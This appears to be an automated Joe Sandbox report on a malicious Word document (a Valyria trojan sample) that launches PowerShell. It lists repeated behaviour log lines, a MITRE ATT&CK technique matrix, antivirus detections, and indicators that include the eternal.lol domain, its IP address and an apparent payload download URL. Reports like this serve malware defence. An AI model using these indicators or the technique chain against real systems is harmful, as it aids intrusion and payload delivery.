      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05110~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information2
      Scripting      		Valid Accounts13
      Exploitation for Client Execution      		2
      Scripting      		1
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote ServicesData from Local System2
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      DUD6CqQ1Uj.doc62%VirustotalBrowse
      DUD6CqQ1Uj.doc61%ReversingLabsDocument-Word.Trojan.Valyria
      DUD6CqQ1Uj.doc100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\Desktop\~WRD0000.tmp100%Joe Sandbox ML

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc260%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.pngxBX%0%Avira URL Cloudsafe
      https://eternal.lol0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      eternal.lol
      		192.64.119.42
      		truefalse
        		unknown
        sni1gl.wpc.sigmacdn.net
        		152.199.21.175
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12722139474.000002ADE0918000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/wpowershell.exe, 00000004.00000002.12696586915.000002ADC99B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/powershell51-helppowershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngxBX%powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Pester/PesterxBX%powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pspowershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://aka.ms/powershell51-helpxBX%powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/powershell51-help(WZ%powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/winsvr-2022-pshelp(WZ%powershell.exe, 00000004.00000002.12696586915.000002ADCA330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC99B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA30A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC9B52000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlxBX%powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://eternal.lolpowershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aka.ms/winsvr-2022-pshelpxBX%powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/winsvr-2022-psspowershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/PSWindows3powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        192.64.119.42
                                                        		eternal.lolUnited States
                                                        		22612NAMECHEAP-NETUSfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1584650
                                                        Start date and time:2025-01-06 06:06:08 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 4m 43s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                        Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                        Run name:Potential for more IOCs and behavior
                                                        Number of analysed new started processes analysed:29
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • GSI enabled (VBA)
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:DUD6CqQ1Uj.doc
                                                        renamed because original name is a hash value
                                                        Original Sample Name:9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb.doc
                                                        Detection:MAL
                                                        Classification:mal96.expl.evad.winDOC@5/16@1/1
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 4
                                                        • Number of non-executed functions: 2
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .doc
                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                        • Attach to Office via COM
                                                        • Scroll down
                                                        • Close Viewer

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.68.130, 52.113.194.132, 52.109.6.63, 52.168.117.168, 52.111.236.33, 52.111.236.32, 52.111.236.35, 52.111.236.34, 95.100.110.78, 95.100.110.68, 40.126.32.74, 152.199.21.175, 20.109.210.53, 20.223.35.26
